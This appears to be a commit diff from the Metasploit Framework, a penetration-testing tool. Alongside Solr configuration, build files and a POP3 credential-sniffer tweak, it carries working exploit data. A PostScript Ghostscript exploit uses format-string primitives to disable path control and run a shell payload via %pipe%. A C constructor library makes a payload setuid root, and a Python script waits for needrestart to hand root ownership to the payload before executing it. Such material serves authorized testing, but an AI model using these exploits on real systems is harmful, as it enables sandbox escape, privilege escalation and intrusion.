You will need to compile the OSX payload separately on an OSX machine, Docker is not supported. The test assume the file
will be named as `show_args_macos`.
## Compile binaries locally
We make use of gcc for this: https://hub.docker.com/_/gcc
- Run:
```shell
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:11.4.0 /bin/bash -c "apt update && apt install -y gcc-mingw-w64 && make all -f makefile.mk"
```
+5
View File
@@ -0,0 +1,5 @@
all: show_args_linux show_args_windows
show_args_linux: show_args.c
cc show_args.c -o show_args_linux
show_args_windows: show_args.c
x86_64-w64-mingw32-gcc show_args.c -o show_args.exe
+7
View File
@@ -0,0 +1,7 @@
int printf(const char *format, ...);
int main(int argc, char *argv[]) {
for (int i = 0; i < argc; i++) {
printf("%s\n", argv[i]);
}
}
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
+1 -1
View File
@@ -13,4 +13,4 @@ responsible for corrupting the Metasploit Framework installation.
For more information about EICAR, please see the following web site:
http://www.eicar.org/anti_virus_test_file.htm
https://www.eicar.org/download-anti-malware-testfile/
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,244 @@
<?xml version="1.0" encoding="UTF-8" ?>
<schema name="default-config" version="1.6">
<field name="id" type="string" indexed="true" stored="true" required="true" multiValued="false" />
<field name="_version_" type="plong" indexed="false" stored="false"/>
<field name="_root_" type="string" indexed="true" stored="false" docValues="false" />
<field name="_nest_path_" type="_nest_path_" /><fieldType name="_nest_path_" class="solr.NestPathField" />
<field name="_text_" type="text_general" indexed="true" stored="false" multiValued="true"/>
<dynamicField name="*_i" type="pint" indexed="true" stored="true"/>
<dynamicField name="*_is" type="pints" indexed="true" stored="true"/>
<dynamicField name="*_s" type="string" indexed="true" stored="true" />
<dynamicField name="*_ss" type="strings" indexed="true" stored="true"/>
<dynamicField name="*_l" type="plong" indexed="true" stored="true"/>
<dynamicField name="*_ls" type="plongs" indexed="true" stored="true"/>
<dynamicField name="*_t" type="text_general" indexed="true" stored="true" multiValued="false"/>
<dynamicField name="*_txt" type="text_general" indexed="true" stored="true"/>
<dynamicField name="*_b" type="boolean" indexed="true" stored="true"/>
<dynamicField name="*_bs" type="booleans" indexed="true" stored="true"/>
<dynamicField name="*_f" type="pfloat" indexed="true" stored="true"/>
<dynamicField name="*_fs" type="pfloats" indexed="true" stored="true"/>
<dynamicField name="*_d" type="pdouble" indexed="true" stored="true"/>
<dynamicField name="*_ds" type="pdoubles" indexed="true" stored="true"/>
<dynamicField name="random_*" type="random"/>
<dynamicField name="ignored_*" type="ignored"/>
<dynamicField name="*_str" type="strings" stored="false" docValues="true" indexed="false" useDocValuesAsStored="false"/>
<dynamicField name="*_dt" type="pdate" indexed="true" stored="true"/>
<dynamicField name="*_dts" type="pdate" indexed="true" stored="true" multiValued="true"/>
<dynamicField name="*_p" type="location" indexed="true" stored="true"/>
<dynamicField name="*_srpt" type="location_rpt" indexed="true" stored="true"/>
<dynamicField name="*_dpf" type="delimited_payloads_float" indexed="true" stored="true"/>
<dynamicField name="*_dpi" type="delimited_payloads_int" indexed="true" stored="true"/>
<dynamicField name="*_dps" type="delimited_payloads_string" indexed="true" stored="true"/>
<dynamicField name="attr_*" type="text_general" indexed="true" stored="true" multiValued="true"/>
<uniqueKey>id</uniqueKey>
<fieldType name="string" class="solr.StrField" sortMissingLast="true" docValues="true" />
<fieldType name="strings" class="solr.StrField" sortMissingLast="true" multiValued="true" docValues="true" />
<fieldType name="boolean" class="solr.BoolField" sortMissingLast="true"/>
<fieldType name="booleans" class="solr.BoolField" sortMissingLast="true" multiValued="true"/>
<fieldType name="pint" class="solr.IntPointField" docValues="true"/>
<fieldType name="pfloat" class="solr.FloatPointField" docValues="true"/>
<fieldType name="plong" class="solr.LongPointField" docValues="true"/>
<fieldType name="pdouble" class="solr.DoublePointField" docValues="true"/>
<fieldType name="pints" class="solr.IntPointField" docValues="true" multiValued="true"/>
<fieldType name="pfloats" class="solr.FloatPointField" docValues="true" multiValued="true"/>
<fieldType name="plongs" class="solr.LongPointField" docValues="true" multiValued="true"/>
<fieldType name="pdoubles" class="solr.DoublePointField" docValues="true" multiValued="true"/>
<fieldType name="random" class="solr.RandomSortField" indexed="true"/>
<fieldType name="ignored" stored="false" indexed="false" multiValued="true" class="solr.StrField" />
<fieldType name="pdate" class="solr.DatePointField" docValues="true"/>
<fieldType name="pdates" class="solr.DatePointField" docValues="true" multiValued="true"/>
<fieldType name="binary" class="solr.BinaryField"/>
<fieldType name="rank" class="solr.RankField"/>
<dynamicField name="*_ws" type="text_ws" indexed="true" stored="true"/>
<fieldType name="text_ws" class="solr.TextField" positionIncrementGap="100">
<analyzer>
<tokenizer name="whitespace"/>
</analyzer>
</fieldType>
<fieldType name="text_general" class="solr.TextField" positionIncrementGap="100" multiValued="true">
<analyzer type="index">
<tokenizer name="standard"/>
<filter name="stop" ignoreCase="true" words="stopwords.txt" />
<filter name="lowercase"/>
</analyzer>
<analyzer type="query">
<tokenizer name="standard"/>
<filter name="stop" ignoreCase="true" words="stopwords.txt" />
<filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
<filter name="lowercase"/>
</analyzer>
</fieldType>
<dynamicField name="*_t_sort" type="text_gen_sort" indexed="true" stored="true" multiValued="false"/>
<dynamicField name="*_txt_sort" type="text_gen_sort" indexed="true" stored="true"/>
<fieldType name="text_gen_sort" class="solr.SortableTextField" positionIncrementGap="100" multiValued="true">
<analyzer type="index">
<tokenizer name="standard"/>
<filter name="stop" ignoreCase="true" words="stopwords.txt" />
<filter name="lowercase"/>
</analyzer>
<analyzer type="query">
<tokenizer name="standard"/>
<filter name="stop" ignoreCase="true" words="stopwords.txt" />
<filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
<filter name="lowercase"/>
</analyzer>
</fieldType>
<dynamicField name="*_txt_en" type="text_en" indexed="true" stored="true"/>
<fieldType name="text_en" class="solr.TextField" positionIncrementGap="100">
<analyzer type="index">
<tokenizer name="standard"/>
<filter name="stop"
ignoreCase="true"
words="lang/stopwords_en.txt"
/>
<filter name="lowercase"/>
<filter name="englishPossessive"/>
<filter name="keywordMarker" protected="protwords.txt"/>
<filter name="porterStem"/>
</analyzer>
<analyzer type="query">
<tokenizer name="standard"/>
<filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
<filter name="stop"
ignoreCase="true"
words="lang/stopwords_en.txt"
/>
<filter name="lowercase"/>
<filter name="englishPossessive"/>
<filter name="keywordMarker" protected="protwords.txt"/>
<filter name="porterStem"/>
</analyzer>
</fieldType>
<dynamicField name="*_txt_en_split" type="text_en_splitting" indexed="true" stored="true"/>
<fieldType name="text_en_splitting" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
<analyzer type="index">
<tokenizer name="whitespace"/>
<filter name="stop"
ignoreCase="true"
words="lang/stopwords_en.txt"
/>
<filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="1" catenateNumbers="1" catenateAll="0" splitOnCaseChange="1"/>
<filter name="lowercase"/>
<filter name="keywordMarker" protected="protwords.txt"/>
<filter name="porterStem"/>
<filter name="flattenGraph" />
</analyzer>
<analyzer type="query">
<tokenizer name="whitespace"/>
<filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
<filter name="stop"
ignoreCase="true"
words="lang/stopwords_en.txt"
/>
<filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="0" catenateNumbers="0" catenateAll="0" splitOnCaseChange="1"/>
<filter name="lowercase"/>
<filter name="keywordMarker" protected="protwords.txt"/>
<filter name="porterStem"/>
</analyzer>
</fieldType>
<dynamicField name="*_txt_en_split_tight" type="text_en_splitting_tight" indexed="true" stored="true"/>
<fieldType name="text_en_splitting_tight" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
<analyzer type="index">
<tokenizer name="whitespace"/>
<filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
<filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
<filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
<filter name="lowercase"/>
<filter name="keywordMarker" protected="protwords.txt"/>
<filter name="englishMinimalStem"/>
<filter name="removeDuplicates"/>
<filter name="flattenGraph" />
</analyzer>
<analyzer type="query">
<tokenizer name="whitespace"/>
<filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
<filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
<filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
<filter name="lowercase"/>
<filter name="keywordMarker" protected="protwords.txt"/>
<filter name="englishMinimalStem"/>
<filter name="removeDuplicates"/>
</analyzer>
</fieldType>
<dynamicField name="*_txt_rev" type="text_general_rev" indexed="true" stored="true"/>
<fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
<analyzer type="index">
<tokenizer name="standard"/>
<filter name="stop" ignoreCase="true" words="stopwords.txt" />
<filter name="lowercase"/>
<filter name="reversedWildcard" withOriginal="true"
maxPosAsterisk="3" maxPosQuestion="2" maxFractionAsterisk="0.33"/>
</analyzer>
<analyzer type="query">
<tokenizer name="standard"/>
<filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
<filter name="stop" ignoreCase="true" words="stopwords.txt" />
<filter name="lowercase"/>
</analyzer>
</fieldType>
<dynamicField name="*_phon_en" type="phonetic_en" indexed="true" stored="true"/>
<fieldType name="phonetic_en" stored="false" indexed="true" class="solr.TextField" >
<analyzer>
<tokenizer name="standard"/>
<filter name="doubleMetaphone" inject="false"/>
</analyzer>
</fieldType>
<dynamicField name="*_s_lower" type="lowercase" indexed="true" stored="true"/>
<fieldType name="lowercase" class="solr.TextField" positionIncrementGap="100">
<analyzer>
<tokenizer name="keyword"/>
<filter name="lowercase" />
</analyzer>
</fieldType>
<dynamicField name="*_descendent_path" type="descendent_path" indexed="true" stored="true"/>
<fieldType name="descendent_path" class="solr.TextField">
<analyzer type="index">
<tokenizer name="pathHierarchy" delimiter="/" />
</analyzer>
<analyzer type="query">
<tokenizer name="keyword" />
</analyzer>
</fieldType>
<dynamicField name="*_ancestor_path" type="ancestor_path" indexed="true" stored="true"/>
<fieldType name="ancestor_path" class="solr.TextField">
<analyzer type="index">
<tokenizer name="keyword" />
</analyzer>
<analyzer type="query">
<tokenizer name="pathHierarchy" delimiter="/" />
</analyzer>
</fieldType>
<dynamicField name="*_point" type="point" indexed="true" stored="true"/>
<fieldType name="point" class="solr.PointType" dimension="2" subFieldSuffix="_d"/>
<fieldType name="location" class="solr.LatLonPointSpatialField" docValues="true"/>
<fieldType name="location_rpt" class="solr.SpatialRecursivePrefixTreeFieldType"
geo="true" distErrPct="0.025" maxDistErr="0.001" distanceUnits="kilometers" />
<fieldType name="delimited_payloads_float" stored="false" indexed="true" class="solr.TextField">
<analyzer>
<tokenizer name="whitespace"/>
<filter name="delimitedPayload" encoder="float"/>
</analyzer>
</fieldType>
<fieldType name="delimited_payloads_int" stored="false" indexed="true" class="solr.TextField">
<analyzer>
<tokenizer name="whitespace"/>
<filter name="delimitedPayload" encoder="integer"/>
</analyzer>
</fieldType>
<fieldType name="delimited_payloads_string" stored="false" indexed="true" class="solr.TextField">
<analyzer>
<tokenizer name="whitespace"/>
<filter name="delimitedPayload" encoder="identity"/>
</analyzer>
</fieldType>
<dynamicField name="*_txt_cjk" type="text_cjk" indexed="true" stored="true"/>
<fieldType name="text_cjk" class="solr.TextField" positionIncrementGap="100">
<analyzer>
<tokenizer name="standard"/>
<filter name="CJKWidth"/>
<filter name="lowercase"/>
<filter name="CJKBigram"/>
</analyzer>
</fieldType>
</schema>
+262
View File
@@ -0,0 +1,262 @@
<?xml version="1.0" encoding="UTF-8" ?>
<config>
<luceneMatchVersion>9.0</luceneMatchVersion>
<dataDir>${solr.data.dir:}</dataDir>
<directoryFactory name="DirectoryFactory"
class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
<codecFactory class="solr.SchemaCodecFactory"/>
<indexConfig>
<lockType>${solr.lock.type:native}</lockType>
</indexConfig>
<updateHandler class="solr.DirectUpdateHandler2">
<updateLog>
<str name="dir">${solr.ulog.dir:}</str>
<int name="numVersionBuckets">${solr.ulog.numVersionBuckets:65536}</int>
</updateLog>
<autoCommit>
<maxTime>${solr.autoCommit.maxTime:15000}</maxTime>
<openSearcher>false</openSearcher>
</autoCommit>
<autoSoftCommit>
<maxTime>${solr.autoSoftCommit.maxTime:-1}</maxTime>
</autoSoftCommit>
</updateHandler>
<query>
<maxBooleanClauses>${solr.max.booleanClauses:1024}</maxBooleanClauses>
<filterCache size="512"
initialSize="512"
autowarmCount="0"/>
<queryResultCache size="512"
initialSize="512"
autowarmCount="0"/>
<documentCache size="512"
initialSize="512"
autowarmCount="0"/>
<cache name="perSegFilter"
class="solr.CaffeineCache"
size="10"
initialSize="0"
autowarmCount="10"
regenerator="solr.NoOpRegenerator" />
<enableLazyFieldLoading>true</enableLazyFieldLoading>
<queryResultWindowSize>20</queryResultWindowSize>
<queryResultMaxDocsCached>200</queryResultMaxDocsCached>
<listener event="newSearcher" class="solr.QuerySenderListener">
<arr name="queries">
</arr>
</listener>
<listener event="firstSearcher" class="solr.QuerySenderListener">
<arr name="queries">
</arr>
</listener>
<useColdSearcher>false</useColdSearcher>
</query>
<circuitBreakers enabled="true">
</circuitBreakers>
<requestDispatcher>
<httpCaching never304="true" />
</requestDispatcher>
<requestHandler name="/select" class="solr.SearchHandler">
<lst name="defaults">
<str name="echoParams">explicit</str>
<int name="rows">10</int>
</lst>
</requestHandler>
<requestHandler name="/query" class="solr.SearchHandler">
<lst name="defaults">
<str name="echoParams">explicit</str>
<str name="wt">json</str>
<str name="indent">true</str>
</lst>
</requestHandler>
<initParams path="/update/**,/query,/select,/spell">
<lst name="defaults">
<str name="df">_text_</str>
</lst>
</initParams>
<searchComponent name="spellcheck" class="solr.SpellCheckComponent">
<str name="queryAnalyzerFieldType">text_general</str>
<lst name="spellchecker">
<str name="name">default</str>
<str name="field">_text_</str>
<str name="classname">solr.DirectSolrSpellChecker</str>
<str name="distanceMeasure">internal</str>
<float name="accuracy">0.5</float>
<int name="maxEdits">2</int>
<int name="minPrefix">1</int>
<int name="maxInspections">5</int>
<int name="minQueryLength">4</int>
<float name="maxQueryFrequency">0.01</float>
</lst>
</searchComponent>
<requestHandler name="/spell" class="solr.SearchHandler" startup="lazy">
<lst name="defaults">
<str name="spellcheck.dictionary">default</str>
<str name="spellcheck">on</str>
<str name="spellcheck.extendedResults">true</str>
<str name="spellcheck.count">10</str>
<str name="spellcheck.alternativeTermCount">5</str>
<str name="spellcheck.maxResultsForSuggest">5</str>
<str name="spellcheck.collate">true</str>
<str name="spellcheck.collateExtendedResults">true</str>
<str name="spellcheck.maxCollationTries">10</str>
<str name="spellcheck.maxCollations">5</str>
</lst>
<arr name="last-components">
<str>spellcheck</str>
</arr>
</requestHandler>
<searchComponent class="solr.HighlightComponent" name="highlight">
<highlighting>
<fragmenter name="gap"
default="true"
class="solr.highlight.GapFragmenter">
<lst name="defaults">
<int name="hl.fragsize">100</int>
</lst>
</fragmenter>
<fragmenter name="regex"
class="solr.highlight.RegexFragmenter">
<lst name="defaults">
<int name="hl.fragsize">70</int>
<float name="hl.regex.slop">0.5</float>
<str name="hl.regex.pattern">[-\w ,/\n\&quot;&apos;]{20,200}</str>
</lst>
</fragmenter>
<formatter name="html"
default="true"
class="solr.highlight.HtmlFormatter">
<lst name="defaults">
<str name="hl.simple.pre"><![CDATA[<em>]]></str>
<str name="hl.simple.post"><![CDATA[</em>]]></str>
</lst>
</formatter>
<encoder name="html"
class="solr.highlight.HtmlEncoder" />
<fragListBuilder name="simple"
class="solr.highlight.SimpleFragListBuilder"/>
<fragListBuilder name="single"
class="solr.highlight.SingleFragListBuilder"/>
<fragListBuilder name="weighted"
default="true"
class="solr.highlight.WeightedFragListBuilder"/>
<fragmentsBuilder name="default"
default="true"
class="solr.highlight.ScoreOrderFragmentsBuilder">
</fragmentsBuilder>
<fragmentsBuilder name="colored"
class="solr.highlight.ScoreOrderFragmentsBuilder">
<lst name="defaults">
<str name="hl.tag.pre"><![CDATA[
<b style="background:yellow">,<b style="background:lawgreen">,
<b style="background:aquamarine">,<b style="background:magenta">,
<b style="background:palegreen">,<b style="background:coral">,
<b style="background:wheat">,<b style="background:khaki">,
<b style="background:lime">,<b style="background:deepskyblue">]]></str>
<str name="hl.tag.post"><![CDATA[</b>]]></str>
</lst>
</fragmentsBuilder>
<boundaryScanner name="default"
default="true"
class="solr.highlight.SimpleBoundaryScanner">
<lst name="defaults">
<str name="hl.bs.maxScan">10</str>
<str name="hl.bs.chars">.,!? &#9;&#10;&#13;</str>
</lst>
</boundaryScanner>
<boundaryScanner name="breakIterator"
class="solr.highlight.BreakIteratorBoundaryScanner">
<lst name="defaults">
<str name="hl.bs.type">WORD</str>
<str name="hl.bs.language">en</str>
<str name="hl.bs.country">US</str>
</lst>
</boundaryScanner>
</highlighting>
</searchComponent>
<updateProcessor class="solr.UUIDUpdateProcessorFactory" name="uuid"/>
<updateProcessor class="solr.RemoveBlankFieldUpdateProcessorFactory" name="remove-blank"/>
<updateProcessor class="solr.FieldNameMutatingUpdateProcessorFactory" name="field-name-mutating">
<str name="pattern">[^\w-\.]</str>
<str name="replacement">_</str>
</updateProcessor>
<updateProcessor class="solr.ParseBooleanFieldUpdateProcessorFactory" name="parse-boolean"/>
<updateProcessor class="solr.ParseLongFieldUpdateProcessorFactory" name="parse-long"/>
<updateProcessor class="solr.ParseDoubleFieldUpdateProcessorFactory" name="parse-double"/>
<updateProcessor class="solr.ParseDateFieldUpdateProcessorFactory" name="parse-date">
<arr name="format">
<str>yyyy-MM-dd['T'[HH:mm[:ss[.SSS]][z</str>
<str>yyyy-MM-dd['T'[HH:mm[:ss[,SSS]][z</str>
<str>yyyy-MM-dd HH:mm[:ss[.SSS]][z</str>
<str>yyyy-MM-dd HH:mm[:ss[,SSS]][z</str>
<str>[EEE, ]dd MMM yyyy HH:mm[:ss] z</str>
<str>EEEE, dd-MMM-yy HH:mm:ss z</str>
<str>EEE MMM ppd HH:mm:ss [z ]yyyy</str>
</arr>
</updateProcessor>
<updateProcessor class="solr.AddSchemaFieldsUpdateProcessorFactory" name="add-schema-fields">
<lst name="typeMapping">
<str name="valueClass">java.lang.String</str>
<str name="fieldType">text_general</str>
<lst name="copyField">
<str name="dest">*_str</str>
<int name="maxChars">256</int>
</lst>
<bool name="default">true</bool>
</lst>
<lst name="typeMapping">
<str name="valueClass">java.lang.Boolean</str>
<str name="fieldType">booleans</str>
</lst>
<lst name="typeMapping">
<str name="valueClass">java.util.Date</str>
<str name="fieldType">pdates</str>
</lst>
<lst name="typeMapping">
<str name="valueClass">java.lang.Long</str>
<str name="valueClass">java.lang.Integer</str>
<str name="fieldType">plongs</str>
</lst>
<lst name="typeMapping">
<str name="valueClass">java.lang.Number</str>
<str name="fieldType">pdoubles</str>
</lst>
</updateProcessor>
<updateRequestProcessorChain name="add-unknown-fields-to-the-schema" default="${update.autoCreateFields:true}"
processor="uuid,remove-blank,field-name-mutating,parse-boolean,parse-long,parse-double,parse-date,add-schema-fields">
<processor class="solr.LogUpdateProcessorFactory"/>
<processor class="solr.DistributedUpdateProcessorFactory"/>
<processor class="solr.RunUpdateProcessorFactory"/>
</updateRequestProcessorChain>
</config>
@@ -0,0 +1,297 @@
%!PS-Adobe-3.0 EPSF-3.0
%%Pages: 1
%%BoundingBox: 36 36 576 756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog
% Make sure to restore the original `setpagedevice` from userdict or systemdict
% in case it has been redefined in another postscript file.
% This happens with ImageMagick for example.
userdict begin
systemdict /setpagedevice known
{
/setpagedevice systemdict /setpagedevice get def
}
if
end
% ====== Configuration ======
% Offset of `gp_file *out` on the stack
/IdxOutPtr MSF_IDXOUTPTR def
% ====== General Postscript utility functions ======
% from: https://github.com/scriptituk/pslutils/blob/master/string.ps
/cat {
exch
dup length 2 index length add string
dup dup 5 2 roll
copy length exch putinterval
} bind def
% from: https://rosettacode.org/wiki/Repeat_a_string#PostScript
/times {
dup length dup % rcount ostring olength olength
4 3 roll % ostring olength olength rcount
mul dup string % ostring olength flength fstring
4 1 roll % fstring ostring olength flength
1 sub 0 3 1 roll % fstring ostring 0 olength flength_minus_one
{ % fstring ostring iter
1 index 3 index % fstring ostring iter ostring fstring
3 1 roll % fstring ostring fstring iter ostring
putinterval % fstring ostring
} for
pop % fstring
} def
% Printing helpers
% /println { print (\012) print } bind def
% /printnumln { =string cvs println } bind def
% ====== Start of exploit helper code ======
% Make a new tempfile but only save its path. This gives us a file path to read/write
% which will exist as long as this script runs. We don't actually use the file object
% (hence `pop`) because we're passing the path to uniprint and reopening it ourselves.
/PathTempFile () (w+) .tempfile pop def
% Convert hex string "4142DEADBEEF" to padded little-endian byte string <EFBEADDE42410000>
% <HexStr> str_ptr_to_le_bytes <ByteStringLE>
/str_ptr_to_le_bytes {
% Convert hex string argument to Postscript string
% using <DEADBEEF> notation
/ArgBytes exch (<) exch (>) cat cat token pop exch pop def
% Prepare resulting string (`string` fills with zeros)
/Res 8 string def
% For every byte in the input
0 1 ArgBytes length 1 sub {
/i exch def
% put byte at index (len(ArgBytes) - 1 - i)
Res ArgBytes length 1 sub i sub ArgBytes i get put
} for
Res % return
} bind def
% <StackString> <FmtString> do_uniprint <LeakedData>
/do_uniprint {
/FmtString exch def
/StackString exch def
% Select uniprint device with our payload
<<
/OutputFile PathTempFile
/OutputDevice /uniprint
/upColorModel /DeviceCMYKgenerate
/upRendering /FSCMYK32
/upOutputFormat /Pcl
/upOutputWidth 99999
/upWriteComponentCommands {(x)(x)(x)(x)} % This is required, just put bogus strings
/upYMoveCommand FmtString
>>
setpagedevice
% Manipulate the interpreter to put a recognizable piece of data on the stack
(%%__) StackString cat .runstring
% Produce a page with some content to trigger uniprint logic
newpath 1 1 moveto 1 2 lineto 1 setlinewidth stroke
showpage
% Read back the written data
/InFile PathTempFile (r) file def
/LeakedData InFile 4096 string readstring pop def
InFile closefile
LeakedData % return
} bind def
% get_index_of_controllable_stack <Idx>
/get_index_of_controllable_stack {
% A recognizable token on the stack to search for
/SearchToken (ABABABAB) def
% Construct "1:%lx,2:%lx,3:%lx,...,400:%lx,"
/FmtString 0 string 1 1 400 { 3 string cvs (:%lx,) cat cat } for def
SearchToken FmtString do_uniprint
% Search for ABABABAB => 4241424142414241 (assume LE)
(4241424142414241) search {
exch pop
exch pop
% <pre> is left
% Search for latest comma in <pre> to get e.g. `123:` as <post>
(,) rsearch pop pop pop
% Search for colon and use <pre> to get `123`
(:) search pop exch pop exch pop
% return as int
cvi
} {
% (Could not find our data on the stack.. exiting) println
quit
} ifelse
} bind def
% <StackIdx> <AddrHex> write_to
/write_to {
/AddrHex exch str_ptr_to_le_bytes def % address to write to
/StackIdx exch def % stack idx to use
/FmtString StackIdx 1 sub (%x) times (_%ln) cat def
AddrHex FmtString do_uniprint
pop % we don't care about formatted data
} bind def
% <StackIdx> read_ptr_at <PtrHexStr>
/read_ptr_at {
/StackIdx exch def % stack idx to use
/FmtString StackIdx 1 sub (%x) times (__%lx__) cat def
() FmtString do_uniprint
(__) search pop pop pop (__) search pop exch pop exch pop
} bind def
% num_bytes <= 9
% <StackIdx> <PtrHex> <NumBytes> read_dereferenced_bytes_at <ResultAsMultipliedInt>
/read_dereferenced_bytes_at {
/NumBytes exch def
/PtrHex exch def
/PtrOct PtrHex str_ptr_to_le_bytes def % address to read from
/StackIdx exch def % stack idx to use
/FmtString StackIdx 1 sub (%x) times (__%.) NumBytes 1 string cvs cat (s__) cat cat def
PtrOct FmtString do_uniprint
/Data exch (__) search pop pop pop (__) search pop exch pop exch pop def
% Check if we were able to read all bytes
Data length NumBytes eq {
% Yes we did! So return the integer conversion of the bytes
0 % accumulator
NumBytes 1 sub -1 0 {
exch % <i> <accum>
256 mul exch % <accum*256> <i>
Data exch get % <accum*256> <Data[i]>
add % <accum*256 + Data[i]>
} for
} {
% We did not read all bytes, add a null byte and recurse on addr+1
StackIdx 1 PtrHex ptr_add_offset NumBytes 1 sub read_dereferenced_bytes_at
256 mul
} ifelse
} bind def
% <StackIdx> <AddrHex> read_dereferenced_ptr_at <PtrHexStr>
/read_dereferenced_ptr_at {
% Read 6 bytes
6 read_dereferenced_bytes_at
% Convert to hex string and return
16 12 string cvrs
} bind def
% <Offset> <PtrHexStr> ptr_add_offset <PtrHexStr>
/ptr_add_offset {
/PtrHexStr exch def % hex string pointer
/Offset exch def % integer to add
/PtrNum (16#) PtrHexStr cat cvi def
% base 16, string length 12
PtrNum Offset add 16 12 string cvrs
} bind def
% () println
% ====== Start of exploit logic ======
% Find out the index of the controllable bytes
% This is around the 200-300 range but differs per binary/version
/IdxStackControllable get_index_of_controllable_stack def
% (Found controllable stack region at index: ) print IdxStackControllable printnumln
% Exploit steps:
% - `gp_file *out` is at stack index `IdxOutPtr`.
%
% - Controllable data is at index `IdxStackControllable`.
%
% - We want to find out the address of:
% out->memory->gs_lib_ctx->core->path_control_active
% hence we need to dereference and add ofsets a few times
%
% - Once we have the address of `path_control_active`, we use
% our write primitive to write an integer to its address - 3
% such that the most significant bytes (zeros) of that integer
% overwrite `path_control_active`, setting it to 0.
%
% - Finally, with `path_control_active` disabled, we can use
% the built-in (normally sandboxed) `%pipe%` functionality to
% run shell commands
/PtrOut IdxOutPtr read_ptr_at def
% (out: 0x) PtrOut cat println
% memory is at offset 144 in out
/PtrOutOffset 144 PtrOut ptr_add_offset def
/PtrMem IdxStackControllable PtrOutOffset read_dereferenced_ptr_at def
% (out->mem: 0x) PtrMem cat println
% gs_lib_ctx is at offset 208 in memory
/PtrMemOffset 208 PtrMem ptr_add_offset def
/PtrGsLibCtx IdxStackControllable PtrMemOffset read_dereferenced_ptr_at def
% (out->mem->gs_lib_ctx: 0x) PtrGsLibCtx cat println
% core is at offset 8 in gs_lib_ctx
/PtrGsLibCtxOffset 8 PtrGsLibCtx ptr_add_offset def
/PtrCore IdxStackControllable PtrGsLibCtxOffset read_dereferenced_ptr_at def
% (out->mem->gs_lib_ctx->core: 0x) PtrCore cat println
% path_control_active is at offset 156 in core
/PtrPathControlActive 156 PtrCore ptr_add_offset def
% (out->mem->gs_lib_ctx->core->path_control_active: 0x) PtrPathControlActive cat println
% Subtract a bit from the address to make sure we write a null over the field
/PtrTarget -3 PtrPathControlActive ptr_add_offset def
% And overwrite it!
IdxStackControllable PtrTarget write_to
% And now `path_control_active` == 0, so we can use %pipe%
(%pipe%MSF_PAYLOAD) (r) file
quit
Binary file not shown.
Binary file not shown.
+27
View File
@@ -0,0 +1,27 @@
/*
// system call
#include <stdlib.h>
// setuid, setgid
#include <unistd.h>
static void a() __attribute__((constructor));
void a() {
setuid(0);
setgid(0);
const char *shell = "chown root:root PAYLOAD_PATH; chmod a+x PAYLOAD_PATH; chmod u+s PAYLOAD_PATH &";
system(shell);
}
*/
extern int setuid(int);
extern int setgid(int);
extern int system(const char *__s);
void a(void) __attribute__((constructor));
void __attribute__((constructor)) a() {
setuid(0);
setgid(0);
system("chown root:root 'PAYLOAD_PATH'; chmod a+x,u+s 'PAYLOAD_PATH'");
}
+17
View File
@@ -0,0 +1,17 @@
import os
import time
import pwd
print("#########################\n\nDont mind the error message above\n\nWaiting for needrestart to run...")
while True:
try:
file_stat = os.stat('PAYLOAD_PATH')
except FileNotFoundError:
exit()
username = pwd.getpwuid(file_stat.st_uid).pw_name
#print(f"Payload owned by: {username}. Stats: {file_stat}")
if (username == 'root'):
os.system('PAYLOAD_PATH &')
exit()
time.sleep(1)
@@ -553,7 +553,7 @@ void createStackWriteFormatString(
formatBuffer+=result;
bufferSize-=result;
// Write the LABEL 6 more times, thus multiplying the the single
// Write the LABEL 6 more times, thus multiplying the single
// byte write pointer to an 8-byte aligned argv-list pointer and
// update argv[0] to point to argv[1..n].
writeCount=(((int)argvStackAddress)-(writeCount+56))&0xffff;
+6 -2
View File
@@ -38,6 +38,10 @@ class SnifferPOP3 < BaseProtocolParser
case s[:last]
when nil
# Its the first +OK must include the banner, worst case its just +OK
# Strip the banner, so that we don't need to do it multiple times
# We can improve the banner by removing the +OK part
s[:banner] = matches.strip
s[:info] = matches
s[:proto] = "tcp"
s[:name] = "pop3"
@@ -62,7 +66,7 @@ class SnifferPOP3 < BaseProtocolParser
:proof => s[:extra],
:status => Metasploit::Model::Login::Status::SUCCESSFUL
)
print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner]})")
# Remove it form the session objects so freeup
sessions.delete(s[:session])
@@ -91,7 +95,7 @@ class SnifferPOP3 < BaseProtocolParser
:proof => s[:extra],
:status => Metasploit::Model::Login::Status::INCORRECT
)
print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner]})")
s[:pass]=""
end
when nil
+188
View File
@@ -0,0 +1,188 @@
[
{
"name": "v0.7.1",
"commit": {
"sha": "56fa824510d8a35b08e3b42bf6625c846e2ed5a0"
}
},
{
"name": "v0.7.0",
"commit": {
"sha": "fdd9ad94c11d44259ef26bf4b2dc9a8bd139f607"
}
},
{
"name": "v0.6.2",
"commit": {
